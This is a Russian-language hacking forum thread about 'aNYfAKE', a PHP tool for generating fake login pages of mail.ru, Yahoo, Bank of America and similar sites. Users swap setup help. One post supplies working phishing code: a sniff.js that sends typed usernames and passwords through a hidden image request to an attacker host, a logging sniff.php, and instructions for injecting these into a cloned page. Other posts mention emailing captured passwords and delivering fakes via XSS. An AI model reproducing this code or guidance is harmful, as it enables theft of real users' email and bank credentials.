aNYfAKE v.1.1

http://img112.imageshack.us/img112/6903/xekxg6.jpg (http://img220.imageshack.us/img220/6185/xekkv0.jpg)

Как настроить читаем на главной странице либо на скрине

Скачать: aNYfAKE_v.1.1.rar | Official (http://www.xeka.ru/public/aNYfAKE_v.1.1.rar)
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com (http://rapidshare.com/files/81574933/aNYfAKE_v.1.1.rar)

Офигеть =) То, что мне нужно было :) Вот только один недочет вроде есть-на примере майл.ру и его динамическим отображением погоды на примере айпи, то есть если у тебя ай-пишник московский - то при заходе на страницу отображается погода в Москве, если Питерский - то в Питере, но тут айпишник идет сервера на котором стоит скрипт, поэтому у слишком бдительных юзеров может возникнуть подозрение... Это можно как-нибудь исправить?

Конечно можно - настроить скриптенк на работу через проксик нужного города. Только во-первых я думаю это нафик не нужно, потому что если юзер параноик, то скрипт перестаёт работать уже на стадии переадресации (ну то бишь переадресацию и так спалят), ну а во-вторых мне просто-напросто лень, ибо мне ест ьчем ещё заняться =). Вот что планирую ещё добавить - так это урл-спуфинг. Покопаюсь в багтраке и прикручу опциональный спуф урла.

Ещё предложения? Замечания?

у мну Unable to connect to mail.ru

1.все придет к тому что люди не будут знать что ява код надо в теги вставлять.
2.хост не подделывается
можно было тогда замутить с яваскрипт+xss втсавляешь скрипт используя xss и вот фейк..плюс дальнейщая реализация
сорри если не правильно понял)1пост

3.alt+s в опере
дальше в начале странице
<base href=''> и не надо править ссылки кроме как в форме

И соотвественно скачивать ничего не надо(картинки скрипты стили)

1.все придет к тому что люди не будут знать что ява код надо в теги вставлять.
2.хост не подделывается
можно было тогда замутить с яваскрипт+xss втсавляешь скрипт используя xss и вот фейк..плюс дальнейщая реализация
сорри если не правильно понял)1пост
Вообще нифига невкурил =)))))) Второй пункт примерно, но смутно, так что распиши, если есть конкретные наработки.

А насчёт третьего пункта - скрипт как раз для того и делался по большей части, что ничего не надо сохранять

Пункт 2
Я имел в виду чтобы твой скрипт генерировал скрипт *.js
загружая его используя xss получался бы фейк,ну типа того
1Тут есть тонкости с самой xss и реализацией ....

Насчет пункта три
Я написал )что
1 нужно в начале странице вставить base href (вместо смены всех ссылок)
2 (дополнение
)нужно вставить ссылку на свой внешний ява скрипт(и больше вообще ничего не надо менять,не ссылки,не даже адрес формы)

Единственное что можно генерировать это как раз пути в это ява скрипте(и то скорее всего они будут относительные-так что опять же особо и генерировать ничего не надо)

Т есть если бы я делал под себя
Я бы написал несоклько типов внешних скриптов *.js
и к сниффу прибавил оповещения(что ты и сделал - т е это несколько функций к снифу каника.)

4.если ты скачиваешь,то полезнее было бы сделать базу фейков.

Если остались еще вопросы и ты их хочешь=\мне задать
пиши в лс а лучше в асю (см профиль )

не хочу мешать полезным сообщениям в теме вроде
"прочитал статью+1аффтару"

у меня тоже самое Unable to connect to mail.ru

Недавно на mail.ru чёт поменяли. win.mail.ru больше не катит, а индекс нормально не обрабатывается. Поэтому на mail.ru временно не пашет

У мну неработает. Просто пустая страница. Убрал error_reporting(0);, выводит ерор
> Fatal error: Maximum execution time of 30 seconds exceeded in /fake/anyfake.php on line 134

Line: $line=ereg_replace($replace, "", $line);
Не думал что понадобится, но наверное надо дописать в начало скрипта

set_time_limit(0);

у меня тоже самое Unable to connect to mail.ru
Сокет не хочет открывать =\ Подумай почему =\\\\

and?

Или mail.ru в дауне или нет поддержки сокетов, других вариантов нет

а как можно узнать мой фри хост поддерживает сокет или нет? Faq хостинга читать чтоли? Или есть какой нить скприпт для проверки?

Sadden, ты свой хост скажи.

Sadden, ты свой хост скажи.

ho.com.ua (это не реклама)

Да, там сокеты запрещены =\

Да, там сокеты запрещены =\

а где не запрещены из бесплатных? И как ты узнал что там запрещены сокеты?

Нет такого бесплатного хостинга, где бы были разрешены сокеты, ибо тогда бы этим все злоупотребляли.

могли бы поставить лимиты. Наверно такие должны быть.

А что если заставить скрипт при запросе удалённой страницы работать как прокси - отсылать заголовок HTTP_X_FORWARDED_FOR? Будет ли, например тот же самый Mail.RU использовать его?

Да, конечно можно, но:

1) Что это нам реально даст
2) Большое множество всяких погодных ресурсов и тому подоюных, которые выдают контент в соответствии с твоим айпишником не смотрят на этот заголовок

Ну если всё-таки есть ещё какая-то причина, то я наверн добавлю =)

Нет такого бесплатного хостинга, где бы были разрешены сокеты, ибо тогда бы этим все злоупотребляли.

Да ладно :) Есть, например freeshells.ch и ещё www.rootshell.be

PS: исправил линки.

Первый недоступен, второй проверяю...
З.Ы. тема не про хостинги, так что прекращаем оффтоп =\

ачат фекнулся нормально, а вот это не хочет...

желаемый линк - https://www.bankofamerica.com/index.jsp

настройки -

$fakable_host = 'bankofamerica.com'; // The host where the page is situated

$fakable_path = '/'; // The path to a fakeble page

$fakable_script = 'index.jsp'; // Page for fake. F.e. "login.php"


HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Aug 2007 01:24:55 GMT Content-length: 122 Content-type: text/html Location: http://bankofamerica.com/index.cfm Connection: close
Moved Permanently
An error has occurred.

может изза ССЛ ? или мой серв не хочет конектиццо потому что ему чтото не хватает?

Да, это из-за SSL, потому что я там сокет на 80 порт открываю, а https пашет через 443 кажется. Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь. В общем, посмотрим, если сложным это не окажется, то эту задачу я поставлю в свой список вещей для ДОкодивания =\

2Sadden: 1. там написано должно быть :). 2. php код примерно такой:

<?php
if (@socket_create()) {
echo "Socket does not support!";
}
?>

+ сокеты (все бесплатники отпадают)да ладно... тебе сказать бесплатники, с поддержкой сокетов, без рекламы, с cPanel и кучей других примочек? :)

2dron-anarchy: Мне скажи.

2Sadden: 1. там написано должно быть :). 2. php код примерно такой:

<?php
if (@socket_create()) {
echo "Socket does not support!";
}
?>



О чем ты?

О чем ты?
Ну просто, проверка, возможна ли работа с сокетами.

Мне скажи.поищи в теме про бесплатные хостинги мои посты. Я там по-моему говорил.
я не жадный. ниче не скрываю от вас, други мои))

Да простит меня автор).
Скриптик жесть....Чисто поржать.

Я такую ***ню давно не встречал. Этож как надо пхп испоганить чтобы такое написать =(. Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем post на get, потому что $_SERVER["QUERY_STRING"] кушает тока пост
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

$full_page = str_replace("method=\"POST\"","method=\"get\"",$full_page);
$full_page = str_replace("method='POST'","method='get'",$full_page);
$full_page = str_replace("method=POST","method=get",$full_page);
$full_page = str_replace("method=\"post\"","method=\"get\"",$full_page);
$full_page = str_replace("method='post'","method='get'",$full_page);
$full_page = str_replace("method=post","method=get",$full_page);

Вот тут я начал истерично ржать. А если на сайте, данные доступны тока через пост?
И еще убила замена через str_replace, тут регулярки нужны а не перечисливать десятки вариаций.

@$sss=fsockopen($fakable_host,80)

Строка убийство.

// - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем пути к картинкам (придёца юзать сокет 2-й раз)
// - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Бугога.

if(strpos($match[0],"http://")===false)

Ну тут сделаем вид что все заебись.

or die("Бля ошибка, твои пароли не сохранились");

Конструкцию or die надо 100% юзать, ведь при малейшем глюке, жертва должна видеть ,почему ее пароли не остались у хакера.


$line=ereg_replace($replace, "", $line);

Конечно, когда не нужны регулярки, их надо юзать.

$request .= "Content-Type: application/x-www-form-urlencoded\n";

А зачем это в методе GET?

header("Location: $redirect_to");

Тут вижу целых 2 помарки.

"$var" и вторая, это опять что в скрипте есть вывод текста, а хидер не может быть вызван после того как текст отобразился на экране....И тут будет целый камнепад из ошибок скрипта.


Мое резюме: Скрипт полностью не пригоден по работе, возможность того что он спалится, работает пиздец как медленно, сделать фейк вручную быстрее чем настроить этот скрипт.
Вывод: скрипт надо стереть пока его никто не видел.

Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь.

Ды да.


$sock=fsockopen('mail.ru',80,$errno, $errstr); //http
$sock=fsockopen('ssl://mail.ru',443,$errno, $errstr); //https


Вот и вся разница между http и https.


Для тех кто хочет сделать нормальный фейк, объясняю:
Можно сделать два вида фейка, статичный и динамичный. Статичный вы один раз спиздили с сайта html налепили к себе и довольны. Второй динамичный. Каждый раз вы сокетами пиздете html с сайта и изменяет нужные вам данные.

Чем плох фейк от бузи кодера, тем что нарушается работа и структура исходного кода. Потом идёт редирект впустую.

Смысл нормального фейка ,чтобы минимум произвести изменений в сурсе, абсолютно не нарушая его работы. Чтобы данные отослались сразу куда надо, а не на сниффер.

Сделаем это через javascript.

Создаем два постоянных файла sniff.js и sniff.php

sniff.js // Отсылает даные на снифер
function sniff(p)
{
var img = document.createElement("img");
img.src='http://hack.site.ru/sniff.php?account='+p;
img.style.cssText='display: none';
document.body.appendChild(img);
}

sniff.php // Логер
<?php
$file=fopen('log.txt','w');
fwrite($file,$_GET['account']);
fclose($file);
?>

Всё, с нашими файлами закончено. Они будут пригодня для всех фейков, так что трогать их не надо.

Терь будем изменять сурс фейка.

1) Подключаем наш яваскрипт.
<script type="text/javascript" src="http://hack.site.ru/sniff.js"></script>
2) Меняем исходные ссылки, на ссылки на фейк
<base href="http://mail.ru">
3) На форму добавим обработчик OnSubmit
<form name...bla.bla.bla OnSubmit="sniff(this.username.value+':'+this.password.value) ;">

Как только юзер сделает отправку данных, создатся пустой объект картинки(невидимый), при запросе этой картинки, и сработает сниффер, а данные полетят куда им надо, т.е. никакого посредничества и разрыва нету.
Всё...фейк готов. Для универсальности, можно в логере, для каждого случая писать новый лог. А в обработчеке форм, пиздить не тока известные поля, а перехватывать содержимое ВСЕХ элементов форумы.


Удачи.

Убейте меня. Я жить после такого позора не могу.

Убейте меня. Я жить после такого позора не могу.

Да ладно тебе) все нормально. Со всеми бывает)

Убейте меня. Я жить после такого позора не могу.
не бзди. Ибо тут
>> Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
пропущен еще и мой ник))

aNYfAKE v.1.1

http://img112.imageshack.us/img112/6903/xekxg6.jpg (http://img220.imageshack.us/img220/6185/xekkv0.jpg)

Как настроить читаем на главной странице либо на скрине :)

Скачать: aNYfAKE_v.1.1.rar | Official (http://www.xeka.ru/public/aNYfAKE_v.1.1.rar)
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com (http://rapidshare.com/files/81574933/aNYfAKE_v.1.1.rar)

Isis,
c yahoo не получается... может подскажешь настройки?

Блин я привык руками :)

руками не умею. маленький еще ;)
а вот с помощью проги....
Может кто поможет с настройками?

вопрос а какой скрипт нужен вместо loginhere.php.

вопрос а какой скрипт нужен вместо loginhere.php.
Тоесть !?
Обычно login.php бывает !

вот мне интересно, чем нужно заполнить поля в энифэйк, чтобы все сработало (чтобы сгенерился рабочий anyfake.php)

zloy_admin, смотри версию 1.1, чего ты про ерёму то....

zloy_admin, смотри версию 1.1, чего ты про ерёму то....

дык ее и пробовал...
но че-то ума мне хватило...
подскажи, плиз
с мэйлом всё норм. а с яху них. не выходит.

На yahoo.com https - SSL
С этим версия 1.1 не совместима..
В ближайшее время выйдет обновление...

Ждем обновления.
А до выхода обновления расчет на полных ламаков :)

дык ее и пробовал...
но че-то ума мне хватило...
подскажи, плиз
с мэйлом всё норм. а с яху них. не выходит.
Так же с homail.com не получится....

Sandjuro, давай все сайты с SSL перечислим?

Sandjuro, давай все сайты с SSL перечислим?
Эмммм....
я домой :)

какой принцип работы скриптига?

ну когда же обновление???

Скоро

какой принцип работы скриптига?
Вероятно берет контент страницы регулрками меняет src , href дописывая http://$host/
Отправляемые данные сохраняет в файл либо отсылает на почту

Жду обновления... А то все время "Unable to connect to yandex.ru" надоело уже)))
Жду...

Времени пока нету

не понял настройку Fake Script на mail.ru какой его писать???

народя вот в этом молодой есче, а дайте пожалуйста сцылук на то чтобы я понял для чего етот скрипт и как он работает!

Если ты прочитал 7 страниц темы и не понял, для чего предназначен скрипт, тогда проходи мимо и не натруждай моск.

народя вот в этом молодой есче, а дайте пожалуйста сцылук на то чтобы я понял для чего етот скрипт и как он работает!
http://win.mail.ru/cgi-bin/auth
Вот этот путь прописывай

интересно, вбил я все данные, нажал на кнопку Fake а дальче что???

Дальше если фтп соответствует всем требованиям , в файле aNYfAKE.php появится ложная страница авторизации

и что с етой ложной страницей авторизацией делать??? кстати перешел на нее а он мне пишет Unable to connect to mail.ru есть какие варианты обхода етого, или это озночает то что настройки программы неправильны!??? :confused:

Это означает что где обшибка или очепятка ;)

Интересно, а на 000webhost.com будет работать?
Скрипт с проверкой сокетов не ругалсо...

Как на данный момент можно сделать fake для mail.ru ?
Возможно ли в принципе с помощью anyfake? (хост 110mb.com)

Интересно, а на 000webhost.com будет работать?
Скрипт с проверкой сокетов не ругалсо...

Работает : ) Правда когда нажимаешь на Вход, пишет ошибку URL... Да и графика исчезает...

Кто подскажет почему на этом сервере 000webhost.com не присылает ответ $

mail("lam@kar.net","Disk","4el $Login Pas: $Password " );

Присылает ответ: 4еl Pas

A ответа переменных нет:(

Ps. Пробывал на локальном сервере всё работает с ответом

Друзья, помогите с настройкой - выложил все на хостинг свой, зашел на страницу, что именно надо вписать в поля

Fake path:
и
Fake script:

А то что бы я ни вписывал, самое путное что получается - страница мэйла с ошибкой "Данная страница не найдена на нашем сервере. "..

Заранее благодарю..

Отличный скрипт, тока долго мучался с настройкой и даже сам не понял как всё-таки всё получилось :) Пасыба автору)

у меня проблема в одном, не загружается ксс :( и ещё вопрос, возможно ли сделать что бы сохранялся весь фейк куда нить :)